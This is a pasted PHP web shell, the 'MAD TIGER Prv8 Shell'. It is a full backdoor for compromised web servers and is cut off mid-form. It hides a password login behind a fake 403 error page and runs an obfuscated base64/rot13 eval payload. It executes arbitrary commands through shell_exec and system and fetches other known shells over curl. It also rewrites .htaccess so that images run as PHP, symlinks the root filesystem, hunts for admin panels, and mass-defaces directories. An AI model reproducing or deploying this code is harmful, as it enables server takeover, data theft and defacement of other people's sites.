

Apr 19th, 2018
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  1. $alert="<script>
  2. window.location.href='?45=".$_GET['act']."';
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  51. function shutdown57_login() {
  52. echo"
  53. <title> Forbidden</title>
  54. </head><body>
  55. <div id='forbid'>
  56. <h1>Forbidden</h1>
  58. <p>You don't have permission to access ".$_SERVER['REQUEST_URI']." on this server.<br>
  59. Server unable to read .htaccess file, denying access to be safe
  60. <br><br>
  61. Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p></div>";
  63. if($_GET['login']=='MAD'){
  65. echo'
  66. <style>
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  94. </style>
  95. <center>
  96. <form method="post">
  97. <table title="selamat datang '.$_SERVER['REMOTE_ADDR'].' MAD TIGER Prv8 ">
  98. <tr><td colspan=2><h1 style="color:red;text-shadow:2px 3px 5px #fff;"><center>[ 1945 ]</h1><br><font color=white> <center>"WELCOME <b>'.$_SERVER['REMOTE_ADDR'].'</b> TO 1945 shell at '.$_SERVER['HTTP_HOST'].' "</font></td></tr>
  99. <tr><td><font color=red size=5 face=courier new> Username :</font></td><td>
  100. <input type="text" value="WithOutShadow" title="you can't change this username." disabled></td></tr>
  101. <tr><td><font color=white size=5 face=courier new>Password :</font></td><td>
  102. <input type="password" name="pass" ></td></tr>
  103. <tr><td colspan=2><input type="submit" value="login!" style="width:100%;color:white;"></td></tr>
  104. </table>
  105. <footer style="bottom:0;left:0;position:fixed;color:#fff">powered by Bangladesh Grey Hat Hackers</footer>
  106. </center>
  107. ';
  108. }
  109. exit;
  110. }
  113. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  114. if( empty( $s57_paswot ) ||
  115. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $s57_paswot) ) )
  116. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  117. else
  118. shutdown57_login();
  120. @eval(str_rot13(gzinflate(str_rot13(base64_decode("ZqjKK6vUQ6/KK1kvKylX1csvKS1oKAEJ6hUkSKnrqFT75xVHFCYlpSrY2ipR+QUquIeFBLnGAnI8XCMVrBTU9Ufi3YJcPYNco9VQ3d2d41Cd3NzVcPXU9ZFyXINcPILc3OM9XMNAZQrOfmFhXkGugRAD0lnN45Pz0rKS0vXUgQbnFUmVJTqUJCWVRxaBXaF2DQA=")))));
  122. ?>
  123. <!DOCTYPE html>
  124. <html>
  125. <head>
  126. <title>.[ <?=judul;?> ].</title>
  127. <link rel="shortcut icon" href="<?=icons;?>">
  128. <?php
  129. if(isset($_SESSION['responsive'])){
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  132. ?>
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  157. </style>
  159. <table class="header">
  160. <tr><td>
  161. <?php
  163. if(!function_exists('posix_getegid')) {
  164. $user = @get_current_user();
  165. $uid = @getmyuid();
  166. $gid = @getmygid();
  167. $group = "?";
  168. } else {
  169. $uid = @posix_getpwuid(posix_geteuid());
  170. $gid = @posix_getgrgid(posix_getegid());
  171. $user = $uid['name'];
  172. $uid = $uid['uid'];
  173. $group = $gid['name'];
  174. $gid = $gid['gid'];
  175. }
  176. $sm= ini_get('safe_mode') ? "<font color=lime> ON<?font>" : "<font color=grey> OFF</font>";
  177. $mysql= function_exists('mysql_connect')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
  178. $url_fp =ini_get('url_fopen')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
  179. $curl=function_exists('curl_init')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
  180. $df=ini_get('disable_functions') ? substr(ini_get('disable_functions'),0,50).",etc..." : "<font color=grey> NONE</font>";
  181. echo "
  182. <div id='left'>
  183. <pre style='font-size:13px;'>
  185. UNAME : ".php_uname()."
  187. IP SERVER : ".gethostbyname($_SERVER['HTTP_HOST'])." | YOUR IP : ".$_SERVER['REMOTE_ADDR']."
  188. User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")
  189. PHP version : ".phpversion()."-[<a href='?act=".getcwd()."&phpinfo=busuK_tampilanNya_kembali_aja'>PHPINFO</a>]
  190. CURL:".$curl."|safemode:".$sm."|URL FOPEN:".$url_fp."|MySQL:".$mysql."
  191. DISABLE FUNCTIONS :".$df."
  192. current dir :";
  193. if(isset($_GET['45'])){
  194. $d=$_GET['45'];
  195. }else{
  196. if(isset($_GET['act'])){
  197. $d=$_GET['act'];
  198. }else{
  199. $d=getcwd();
  201. }
  202. }
  203. $d=str_replace('\','/',$d);
  204. $path = explode('/',$d);
  206. foreach($path as $id=>$curdir){
  207. if($curdir == '' && $id == 0){
  208. $a = true;
  209. echo '<a href="?45=/">/</a>';
  210. continue;
  211. }
  212. if($curdir == '') continue;
  213. echo '<a href="?45=';
  214. for($i=0;$i<=$id;$i++){
  215. echo "$path[$i]";
  216. if($i != $id) echo "/";
  217. }
  218. echo '">'.$curdir.'</a>/';
  219. }
  220. $pwd=str_replace('\','/',getcwd());
  221. (is_writable($d))?$stat="<font color=lime>WRITABLE</font>" :$stat="<a style='color:grey' href='?act=".$_GET['45']."&notw=".$_GET['45']."'>NOT WRITABLE</a>";
  223. ?>
  224. ~[<?php echo $stat;?>][<a href="?45=<?php echo $pwd; ?>">Home</a>][<a href="javascript:history.go(-1);">back</a>]
  225. </div>
  226. </td><td>
  227. <div id='right'>
  228. <center>
  229. --<[<a href="?act=<?php echo $d;?>&about=<?php echo $d;?>">MAD TIGER Prv8 Shell</a>|<a href="?act=<?=$d;?>&theme=<?=$d;?>">THEMES</a>|<a href="?act=logout">Kill Me</a>]--[
  230. </center>
  231. <br>
  232. [<a href="?act=<?php echo $d;?>&newfile=<?php echo $d;?>">Newfile</a>]
  233. [<a href="?act=<?php echo $d;?>&mkdir=<?php echo $d;?>">NewDir</a>]
  234. [<a href="?act=<?php echo $d;?>&shell=<?php echo $d;?>">Shell</a>]
  235. [<a href="?act=<?php echo $d;?>&conf=<?php echo $d;?>">config grab</a>]
  236. [<a href="?act=<?php echo $d;?>&admfind=<?php echo $d;?>">Admin finder</a>]
  237. <br>
  238. [<a href="?act=<?php echo $d;?>&upload=<?php echo $d;?>">Upload</a>]
  239. [<a href="?act=<?php echo $d;?>&unzip=<?php echo $d;?>">Unzip file</a>]
  240. [<a href="?act=<?php echo $d;?>&stringtools=<?php echo $d;?>">String Tools</a>]
  241. [<a href="?act=<?php echo $d;?>&kuchiyose=<?php echo $d;?>">Unknown</a>]
  242. [<a href="?act=<?php echo $d;?>&copy=<?php echo $d;?>">Copy</a>]
  243. <br>
  244. [<a href="?act=<?php echo $d;?>&ctools=<?php echo $d;?>">Create tools</a>]
  245. [<a href="?act=<?php echo $d;?>&mail=<?php echo $d;?>">spoofing</a>]
  246. [<a href="?act=<?php echo $d;?>&massdeface=<?php echo $d;?>">Mass deface</a>]
  247. [<a href="?act=<?php echo $d;?>&zoneh=<?php echo $d;?>">Zone-H</a>]
  248. [<a href="?act=<?php echo $d;?>&cpbrute=<?php echo $d;?>">cPanel bruteforce/Not workabel</a>]
  249. <br><br>
  250. <form method="get">
  251. Go to dir:<input type="text" name="45" value="<?php echo $d;?>" style="width:250px">
  252. <input type="submit" value=">>">
  253. </form>
  254. </div>
  255. </td></tr></table>
  256. <?php
  258. if(isset($_GET['act'])){
  259. //14 + Shell
  260. $k=array(
  261. 'Adminer'=>"",
  262. 'wso'=>"",
  263. 'Mini shell'=>"",
  264. 'Symlink config Graber'=>"",
  265. 'Alpha'=>'',
  266. 'pastebin'=>'',
  267. 'indoxploit_shell'=>'',
  268. 'Dhanush'=>'',
  269. 'injection'=>'',
  270. 'sbh'=>'',
  271. 'bh'=>'',
  272. 'jkt48'=>'',
  273. 'c99'=>'',
  274. 'r57'=>'',
  275. );
  276. function kuchiyose($url, $isi) {
  277. $fp = fopen($isi, "w");
  278. $ch = curl_init();
  279. curl_setopt($ch, CURLOPT_URL, $url);
  280. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  281. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  282. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  283. curl_setopt($ch, CURLOPT_FILE, $fp);
  284. return curl_exec($ch);
  285. curl_close($ch);
  286. fclose($fp);
  287. ob_flush();
  288. flush();
  289. }
  290. if($_GET['kuchiyose']=='adminer'){
  291. if(file_exists('MAD_adminer.php')){
  292. echo" done!! => <a href='MAD_adminer.php' target='_blank'>click here</a>";
  293. }else{
  294. if(kuchiyose($k['adminer'],'MAD_adminer.php')){
  295. echo"done!! --> <a href='MAD_adminer.php' target='_blank'>click here..</a>";
  296. }else{
  297. echo" failed!! check your connection!/ Something Was Wrong!";
  298. }
  299. }
  300. }elseif($_GET['notw']){
  301. if(chmod($_GET['notw'],0777)){
  302. echo"<script>
  303. alert('chmod successfull..');
  304. window.location.href='?45=".$_GET['notw'];
  305. }else{
  306. echo"
  307. <script>
  308. alert('gagal CHMOD Directory :( ');
  309. </script>";
  310. }
  311. }elseif ($_GET['kuchiyose']=='wso') {
  312. if(file_exists('MAD_wso.php')){
  313. echo" done!! => <a href='MAD_wso.php' target='_blank'>click here</a>";
  314. }else{
  315. if(kuchiyose($k['wso'],'MAD_wso.php')){
  316. echo"done!! --> <a href='MAD_wso.php' target='_blank'>click here..</a>";
  317. }else{
  318. echo" failed!! check your connection!";
  319. }
  320. }
  321. }elseif ($_GET['kuchiyose']=='whmcs') {
  322. if(file_exists('1945_whmcs.php')){
  323. echo" done!! => <a href='1945_whmcs.php' target='_blank'>click here</a>";
  324. }else{
  325. if(kuchiyose($k['whmcs'],'Mini.php')){
  326. echo"done!! --> <a href='mini.php' target='_blank'>click here..</a>";
  327. }else{
  328. echo" failed!! check your connection!";
  329. }
  330. }
  331. }elseif ($_GET['kuchiyose']=='bejak') {
  332. if(file_exists('1945_b374k.php')){
  333. echo" done!! => <a href='1945_b374k.php' target='_blank'>click here</a>";
  334. }else{
  335. if(kuchiyose($k['bejak'],'Sym.php')){
  336. echo"done!! --> <a href='sym.php' target='_blank'>click here..</a>";
  337. }else{
  338. echo" failed!! check your connection!";
  339. }
  340. }
  341. }elseif ($_GET['kuchiyose']=='bypass_shell') {
  342. $isi="n Addhandler application/x-httpd-php .jpg";
  344. $fp=fopen('.htaccess','a+');
  345. if(fwrite($fp,$isi)){
  346. if(rename($_SERVER['SCRIPT_FILENAME'],"mad.jpg")){
  347. echo"
  348. <script>
  349. alert('Baler Server| Done!');
  350. window.location.href='mad.jpg'
  351. </script>";
  352. }
  353. }
  354. fclose($fp);
  355. }elseif ($_GET['kuchiyose']=='terminal') {
  356. if(file_exists('Sym.php')){
  357. echo" done!! => <a href='Alpha.php' target='_blank'>click here</a>";
  358. }else{
  359. if(kuchiyose($k['terminal'],'Alpha.php')){
  360. echo"done!! --> <a href='Alpha.php' target='_blank'>click here..</a>";
  361. }else{
  362. echo" failed!! check your connection!";
  363. }
  364. }
  365. }elseif ($_GET['kuchiyose']=='pastebin') {
  366. if(file_exists('MAD_pastebin.php')){
  367. echo" done!! => <a href='MAD_pastebin.php' target='_blank'>click here</a>";
  368. }else{
  369. if(kuchiyose($k['pastebin'],'MAD_pastebin.php')){
  370. echo"done!! --> <a href='MAD_pastebin.php' target='_blank'>click here..</a>";
  371. }else{
  372. echo" failed!! check your connection!";
  373. }
  374. }
  375. }elseif ($_GET['kuchiyose']=='indoxploit_shell') {
  376. if(file_exists('MAD_indoXploit_shell.php')){
  377. echo" done!! => <a href='MAD_indoXploit_shell.php' target='_blank'>click here</a>";
  378. }else{
  379. if(kuchiyose($k['indoxploit_shell'],'MAD_indoxploit_shell.php')){
  380. echo"done!! --> <a href='MAD_indoxploit_shell.php' target='_blank'>click here..</a>";
  381. }else{
  382. echo" failed!! check your connection!";
  383. }
  384. }
  385. }elseif ($_GET['kuchiyose']=='andela') {
  386. if(file_exists('MAD_andela.php')){
  387. echo" done!! => <a href='MAD_andela.php' target='_blank'>click here</a>";
  388. }else{
  389. if(kuchiyose($k['andela'],'MAD_andela.php')){
  390. echo"done!! --> <a href='MAD_andela.php' target='_blank'>click here..</a>";
  391. }else{
  392. echo" failed!! check your connection!";
  393. }
  394. }
  395. }elseif ($_GET['kuchiyose']=='injection') {
  396. if(file_exists('MAD_1n73ction.php')){
  397. echo" done!! => <a href='MAD_1n73ction.php' target='_blank'>click here</a>";
  398. }else{
  399. if(kuchiyose($k['injection'],'MAD_1n73ction.php')){
  400. echo"done!! --> <a href='MAD_1n73ction.php' target='_blank'>click here..</a>";
  401. }else{
  402. echo" failed!! check your connection!";
  403. }
  404. }
  405. }elseif ($_GET['kuchiyose']=='sbh') {
  406. if(file_exists('MAD_sbh.php')){
  407. echo" done!! => <a href='MAD_sbh.php' target='_blank'>click here</a>";
  408. }else{
  409. if(kuchiyose($k['sbh'],'MAD_sbh.php')){
  410. echo"done!! --> <a href='MAD_sbh.php' target='_blank'>click here..</a>";
  411. }else{
  412. echo" failed!! check your connection!";
  413. }
  414. }
  415. }elseif ($_GET['kuchiyose']=='bh') {
  416. if(file_exists('MAD_bh.php')){
  417. echo" done!! => <a href='MAD_bh.php' target='_blank'>click here</a>";
  418. }else{
  419. if(kuchiyose($k['bh'],'MAD_bh.php')){
  420. echo"done!! --> <a href='MAD_bh.php' target='_blank'>click here..</a>";
  421. }else{
  422. echo" failed!! check your connection!";
  423. }
  424. }
  425. }elseif ($_GET['kuchiyose']=='jkt48') {
  426. if(file_exists('MAD_jkt48.php')){
  427. echo" done!! => <a href='MAD_jkt48.php' target='_blank'>click here</a>";
  428. }else{
  429. if(kuchiyose($k['jkt48'],'MAD_jkt48.php')){
  430. echo"done!! --> <a href='MAD_jkt48.php' target='_blank'>click here..</a>";
  431. }else{
  432. echo" failed!! check your connection!";
  433. }
  434. }
  435. }elseif ($_GET['kuchiyose']=='c99') {
  436. if(file_exists('MAD_c99.php')){
  437. echo" done!! => <a href='MAD_c99.php' target='_blank'>click here</a>";
  438. }else{
  439. if(kuchiyose($k['c99'],'MAD_c99.php')){
  440. echo"done!! --> <a href='MAD_c99.php' target='_blank'>click here..</a>";
  441. }else{
  442. echo" failed!! check your connection!";
  443. }
  444. }
  445. }elseif ($_GET['kuchiyose']=='r57') {
  446. if(file_exists('MAD_r57.php')){
  447. echo" done!! => <a href='MAD_r57.php' target='_blank'>click here</a>";
  448. }else{
  449. if(kuchiyose($k['r57'],'MAD_r57.php')){
  450. echo"done!! --> <a href='mad_r57.php' target='_blank'>click here..</a>";
  451. }else{
  452. echo" failed!! check your connection!";
  453. }
  454. }
  455. }
  456. elseif ($_GET['Unkonwn']=='root') {
  457. system('ln -s / mad_tiger.txt');
  458. $fvckem ='T1BUSU9OUyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzIFN5bUxpbmtzSWZPd25lck1hdGNoIEluY2x1ZGVzIEluY2x1ZGVzTk9FWEVDIEV4ZWNDR0kKT3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzCkZvcmNlVHlwZSB0ZXh0L3BsYWluCkFkZFR5cGUgdGV4dC9wbGFpbiAucGhwIApBZGRUeXBlIHRleHQvcGxhaW4gLmh0bWwKQWRkVHlwZSB0ZXh0L2h0bWwgLnNodG1sCkFkZFR5cGUgdHh0IC5waHAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAKQWRkSGFuZGxlciB0eHQgLnBocApBZGRIYW5kbGVyIHR4dCAuaHRtbApBZGRIYW5kbGVyIHR4dCAuc2h0bWwKT3B0aW9ucyBBbGwKT3B0aW9ucyBBbGw=';
  459. $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Mauritania = symlink("/","tiger.txt");
  460. $rt="<br><a href='tiger.txt' TARGET='_blank'><font color=#ff0000 size=2 face=' New'><b>
  461. Touched by MAD TIGER</b></font></a></center>";
  462. echo "<center><br><br><b>Done.. !</b><br>".$rt;
  463. echo "</form>";
  464. }
  465. elseif(isset($_GET['rmdir'])){
  467. //????????? ????, ????????? ?????
  468. function rmdir_unlink_rmdir($d){
  469. if(!rmdir($d)){
  470. $s=scandir($d);
  471. foreach ($s as $ss) {
  472. if(is_file($d."/".$ss)){
  473. if(unlink($d."/".$ss)){
  474. rmdir($d);
  476. }
  477. }
  478. if(is_dir($d."/".$ss)){
  479. rmdir($d."/".$ss);
  480. rmdir($d);
  482. }
  483. }
  484. }
  485. }
  486. if(rmdir_unlink_rmdir($_GET['rmdir'])){
  487. echo $alert;
  488. }else{
  489. echo $alert;
  490. }
  491. }elseif(isset($_GET['rm'])){
  492. $rm=$_GET['rm'];
  493. if(unlink($rm)){
  494. echo $alert;
  495. }
  496. }elseif(isset($_GET['rename'])){
  497. echo"
  498. <br><br><br><br>
  499. <center>
  500. <form method='post' >
  501. <p>Old name : ".basename($_GET['Rename'])."</p>
  502. NewName :
  503. <input type='text' name='newname' value='".$_GET['rename']."'><input type='submit' value='>>'>
  504. </form>";
  505. if(isset($_POST['newname'])){
  506. $oldname=$_GET['rename'];
  507. $newname=$_POST['newname'];
  508. if(rename($oldname,$newname)){
  509. echo $alert;
  510. }
  511. }
  512. }elseif (isset($_GET['edit'])) {
  513. echo"
  514. <center>
  515. <form method='post' >
  516. <textarea name='edit'>".htmlspecialchars(file_get_contents($_GET['edit']))."</textarea>
  517. <br>
  518. <input type='text' name='editdir' value='".$_GET['edit']."' style='width:350px'><input type='submit' name='editsave' value='save' >
  519. </form>";
  520. if(isset($_POST['editsave'])){
  521. $fp=fopen($_POST['editdir'],'w');
  522. if(fwrite($fp,$_POST['edit'])){
  523. echo"<br> saved@".date('D M Y');
  524. }
  525. fclose($fp);
  526. }
  527. }elseif (isset($_GET['chmod'])) {
  528. echo"<center>
  529. <h3>: change permission files :</h3>
  530. <form method='post' >
  531. Permission :
  532. <input type='text' name='perms' value='".fileperms($_GET['chmod'])."'><input type='submit' value='>>'>
  533. </form>";
  534. if(isset($_POST['perms'])){
  535. if(chmod($_GET['chmod'],$_POST['perms'])){
  536. echo'Permission changed! <a href="javascript:history.go(-1)">back</a>';
  537. }
  538. }
  539. }elseif (isset($_GET['src'])) {
  541. echo'
  542. <table>
  543. <tr><td>[<a href="?act='.$_GET['act'].'&edit='.$_GET['src'].'">Edit</a>]</td><td>
  544. [<a href="?act='.$_GET['act'].'&rm='.$_GET['src'].'">delete</a>]</td><td>
  545. [<a href="?act='.$_GET['act'].'&rename='.$_GET['src'].'">Rename</a>]</td><td>
  546. [<a href="?act='.$_GET['act'].'&chmod='.$_GET['src'].'">Chmod</a>]</td><td>
  547. [<a href="?act='.$_GET['act'].'&download='.$_GET['src'].'">Raw</a>]</td></tr></table>
  548. <center>
  549. <h3>: View file :</h3>
  550. <p>Current file: <font color=white>'.$_GET['src'].'</font></p>
  551. ';
  552. $src=$_GET['src'];
  553. $get_basename=basename($src);
  554. $a=preg_match('/.jpg/',$get_basename);
  555. $b=preg_match('/.png/',$get_basename);
  556. $c=preg_match('/.gif/',$get_basename);
  557. $cwd=str_replace('\','/',getcwd());
  558. $plc=str_replace($cwd,'',$src);
  560. if($c||$b||$a){
  561. echo"
  562. <br>
  563. <center>
  564. <img src='".$plc."' id='viewimg' />";
  565. }else{
  566. $f=$_GET['src'];
  567. $file = wordwrap(file_get_contents($f),160,"n",true);
  568. $a= highlight_string($file,true);
  569. $old = array("0000BB","000000","FF8000","DD0000", "007700");
  570. $new = array("81FF00","e1e1e1", "333333", "ffffff" , "FF8000");
  571. $a= str_ireplace($old,$new, $a);
  572. $result = $a;
  574. echo'
  576. <pre class="code">'.$result.'</pre>';
  577. }
  578. }elseif (isset($_GET['upload'])) {
  579. if(isset($_POST['upfile'])){
  580. $files = array(
  581. '1' => $_FILES['files']['name'],
  582. '2' => $_FILES['files2']['name'],
  583. '3' => $_FILES['files3']['name'],
  584. '4' => $_FILES['files4']['name'],
  585. '5' => $_FILES['files5']['name']
  586. );
  587. $tmp= array(
  588. '1' => $_FILES['files']['tmp_name'],
  589. '2' => $_FILES['files2']['tmp_name'],
  590. '3' => $_FILES['files3']['tmp_name'],
  591. '4' => $_FILES['files4']['tmp_name'],
  592. '5' => $_FILES['files5']['tmp_name']
  593. );
  594. $dir=array(
  595. '1' => $_POST['dir']."/",
  596. '2' => $_POST['dir2']."/",
  597. '3' => $_POST['dir3']."/",
  598. '4' => $_POST['dir4']."/",
  599. '5' => $_POST['dir5']."/"
  600. );
  601. if(move_uploaded_file($tmp['1'],$dir['1'].$files['1'])){
  602. echo"<br>uploaded -->".$dir['1'].$files['1'];
  603. }
  604. if(move_uploaded_file($tmp['2'],$dir['2'].$files['2'])) {
  605. echo"<br> uploaded --> ".$dir['2'].$files['2'];
  606. }
  607. if(move_uploaded_file($tmp['3'],$dir['3'].$files['3'])){
  608. echo"<br>uploaded --> ".$dir['3'].$files['3'];
  609. }
  610. if(move_uploaded_file($tmp['4'],$dir['4'].$files['4'])){
  611. echo"<br>uploaded --> ".$dir['4'].$files['5'];
  612. }
  613. if(move_uploaded_file($tmp['5'],$dir['5'].$files['5'])){
  614. echo"<br>uploaded --> ".$dir['5'].$files['5'];
  615. }
  617. echo"<br>
  618. <font color=white>Upload Done! :)</font>";
  619. }
  620. if(is_writable($_GET['upload'])){
  621. $stat='<font color="lime">Writable(DONE)</font>';
  622. }else{
  623. $stat='<font color="grey">Not Writable(sorry)</font>';
  624. }
  625. ?>
  626. <center>
  627. <h3>: MultiUpload Files :</h3>
  628. <p> status upload file : <?php echo $stat;?></p>
  629. <font color=white>NB : Click For Open Folder </font>
  630. <table border=1><tr><td>file</td><td>Target Dir</td></tr>
  631. <tr><td>
  632. <form method="Post" enctype="multipart/form-data">
  633. <input type="file" name="files" ></td><td>
  634. <input type="text" name="dir" value="<?php echo $_GET['upload']; ?>" >
  635. </td></tr><tr><td>
  636. <input type="file" name="files2" ></td><td>
  637. <input type="text" name="dir2" value="<?php echo $_GET['upload']; ?>" >
  638. </td></tr><tr><td>
  639. <input type="file" name="files3" ></td><td>
  640. <input type="text" name="dir3" value="<?php echo $_GET['upload']; ?>" >
  641. </td></tr><tr><td>
  642. <input type="file" name="files4" ></td><td>
  643. <input type="text" name="dir4" value="<?php echo $_GET['upload']; ?>" >
  644. </td></tr><tr><td>
  645. <input type="file" name="files5"></td><td>
  646. <input type="text" name="dir5" value="<?php echo $_GET['upload']; ?>">
  647. </td></tr></table>
  648. <br>
  649. <input type="submit" name="upfile" class="btn btn-primary" value="upload all">
  651. </form>
  652. </center>
  653. <?php
  654. }elseif (isset($_GET['mkdir'])) {
  655. echo'
  656. <center>
  657. <h3>: New Folder</h3>
  658. <form method="post">
  659. newdir:<input type="text" name="mkdir" value="'.$_GET['mkdir'].'/mina" style="width:200px;">
  660. <input type="submit" value=">>">
  661. </form>';
  662. if(isset($_POST['mkdir'])){
  663. if(mkdir($_POST['mkdir'])){
  664. echo $alert;
  665. }
  666. }
  667. }elseif (isset($_GET['newfile'])) {
  668. echo'
  669. <center>
  670. <h3>: Newfile :</h3>
  671. <form method="post">
  672. <textarea name="newfile"> </textarea>
  673. <br>
  674. Save :<input type="text" name="saveas" value="'.$_GET['newfile'].'/bghh.php" style="width:60%">
  675. <input type="submit" value=">>" name="subfile">
  676. </form><br><br><br>';
  677. if(isset($_POST['subfile'])){
  678. $fp=fopen($_POST['saveas'],'w');
  679. if(fwrite($fp,$_POST['newfile'])){
  680. echo $alert;
  681. }
  682. fclose($fp);
  683. }
  684. }elseif (isset($_GET['shell'])) {
  685. echo'
  686. <center>
  687. <fieldset style="border-collapse:collapse;height:500px;">
  688. <legend>Terminal</legend>
  689. <form method="post">
  690. <div style="float:left;text-align:left">
  691. '.$user.'@<font color=white>'.$_SERVER['HTTP_HOST'].'</font><font color=lime> '.$_GET['shell'].'</font> #:<input type="text" name="command" style="border:0;width:400px;max-width:relative;">
  692. </div>
  693. </form>';
  694. if(isset($_POST['command'])){
  695. if(function_exists('shell_exec')){
  696. $cmd=shell_exec($_POST['command']);
  697. }else{
  698. if(function_exists('exec')){
  699. $cmd=exec($_POST['command']);
  700. }else{
  701. if(function_exists('system'));
  702. $cmd=system($_POST['command']);
  703. }
  704. }
  705. echo'
  706. <br>
  708. <textarea style="color:lime;text-align:left;width:100%;height:90%;border:0;resize:none;" readonly>
  709. '.$cmd.'</textarea></fieldset>';
  710. }
  711. }elseif (isset($_GET['admfind'])) {
  712. ?>
  713. <center>
  714. <h3>Admin Finder</h3>
  715. <form method="POST" action="">
  716. site :
  717. <input type="text" name="url" style="width:260px" value="http://"/>
  719. <input type="submit" name="submit" value="Done=====>" />
  720. </p>
  721. <br>
  722. <br>
  724. <?php
  726. function xss_protect($data, $strip_tags = false, $allowed_tags = "") {
  727. if($strip_tags) {
  728. $data = strip_tags($data, $allowed_tags . "<b>");
  729. }
  731. if(stripos($data, "script") !== false) {
  732. $result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES));
  733. } else {
  734. $result = htmlentities($data, ENT_QUOTES);
  735. }
  737. return $result;
  738. }
  739. function urlExist($url)
  740. {
  741. $handle = curl_init($url);
  742. if (false === $handle)
  743. {
  744. return false;
  745. }
  746. curl_setopt($handle, CURLOPT_HEADER, false);
  747. curl_setopt($handle, CURLOPT_FAILONERROR, true);
  748. curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20080623 Firefox/") ); // request as if Firefox
  749. curl_setopt($handle, CURLOPT_NOBODY, true);
  750. curl_setopt($handle, CURLOPT_RETURNTRANSFER, false);
  751. $connectable = curl_exec($handle);
  752. curl_close($handle);
  753. return $connectable;
  754. }
  755. if(isset($_POST['submit']) && isset($_POST['url']))
  756. {
  757. $url= htmlentities(xss_protect($_POST['url']));
  758. if(filter_var($url, FILTER_VALIDATE_URL))
  759. {
  760. $trying = array(':admin/','Admin/','ADMIN/','_admin','adminsettings/','administrator/','administration/','administrator.php','dashbord/','control/','admin.php','adminpanel/','siteadmin/','panel/','webadmin/','moderator/','admin-login/',
  761. 'adminarea/','adminlogin/','bb-admin/','admin_area/','panel-administracion/','cms/','upload/','memberadmin/','administratorlogin/','adm/','account.php',
  762. 'admin/account.php','admin/login.php','admin/admin.php','admin_area/admin.php','admin_area/login.php','admin_area/index.php','admin_area/index.php',
  763. 'bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin/controlpanel.php','admin/cp.php','administrator/index.php',
  764. 'administrator/login.php','administrator/account.php','moderator.php','moderator/login.php','moderator/admin.php','admincontrol/','admincontrol.php','admin_login.html','panel-administracion/login.php',
  765. 'admin/home.php','admin/controlpanel.php','admin.php','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','php','admin_login.php',
  766. 'panel-administracion/login.php','admin/home.php','admin/controlpanel.php','pages/admin/','admin/admin-login.php','admin-login.php');
  767. foreach($trying as $sec)
  768. {
  769. $urll=$url.'/'.$sec;
  770. if(urlExist($urll))
  771. {
  772. echo '<p align="center"><font color="00FF00">Done==>> <a href="'.$urll.'" target="_blank">'.$urll.'</a></font></p>';
  773. exit;
  774. }
  775. else
  776. {
  777. echo '<p align="center"><font color="#eee">sorry= '.$urll.'</font></p>';
  778. }
  779. }
  780. echo 'Hey Dont Worry :) You Can Try My Python Script';
  781. }
  782. else
  783. {
  784. echo '<p>Invalid URL entered</p>';
  785. }
  786. }
  788. }elseif (isset($_GET['massdeface'])) {
  789. echo'<center>
  790. <h3> : Mass Deface :</h3>
  791. <small>By MAD TIGER </small>';
  792. function sabun_massal($dir,$namafile,$isi_script) {
  793. if(is_writable($dir)) {
  794. $dira = scandir($dir);
  795. foreach($dira as $dirb) {
  796. $dirc = "$dir/$dirb";
  797. $lokasi = $dirc.'/'.$namafile;
  798. if($dirb === '.') {
  799. file_put_contents($lokasi, $isi_script);
  800. } elseif($dirb === '..') {
  801. file_put_contents($lokasi, $isi_script);
  802. } else {
  803. if(is_dir($dirc)) {
  804. if(is_writable($dirc)) {
  805. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  806. file_put_contents($lokasi, $isi_script);
  807. $idx = sabun_massal($dirc,$namafile,$isi_script);
  808. }
  809. }
  810. }
  811. }
  812. }
  813. }
  814. function sabun_biasa($dir,$namafile,$isi_script) {
  815. if(is_writable($dir)) {
  816. $dira = scandir($dir);
  817. foreach($dira as $dirb) {
  818. $dirc = "$dir/$dirb";
  819. $lokasi = $dirc.'/'.$namafile;
  820. if($dirb === '.') {
  821. file_put_contents($lokasi, $isi_script);
  822. } elseif($dirb === '..') {
  823. file_put_contents($lokasi, $isi_script);
  824. } else {
  825. if(is_dir($dirc)) {
  826. if(is_writable($dirc)) {
  827. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  828. file_put_contents($lokasi, $isi_script);
  829. }
  830. }
  831. }
  832. }
  833. }
  834. }
  835. if($_POST['start']) {
  836. if($_POST['tipe_sabun'] == 'mahal') {
  837. echo "<div style='margin: 5px auto; padding: 5px'>";
  838. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  839. echo "</div>";
  840. } elseif($_POST['tipe_sabun'] == 'murah') {
  841. echo "<div style='margin: 5px auto; padding: 5px'>";
  842. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  843. echo "</div>";
  844. }
  845. } else {
  846. echo "<center>";
  847. echo "<form method='post'>
  848. <font style='text-decoration: underline;'>:BGHH:</font><br>
  849. <input type='radio' name='tipe_sabun' value='murah' checked>Mass Single File<input type='radio' name='BGHH' value='mahal'>Mass All file<br>
  850. <font style='text-decoration: underline;'>Folder:</font><br>
  851. <input type='text' name='d_dir' value='$_GET[massdeface]' style='width: 450px;' height='10'><br>
  852. <font style='text-decoration: underline;'>Filename:</font><br>
  853. <input type='text' name='d_file' value='mad.php' style='width: 450px;' height='10'><br>
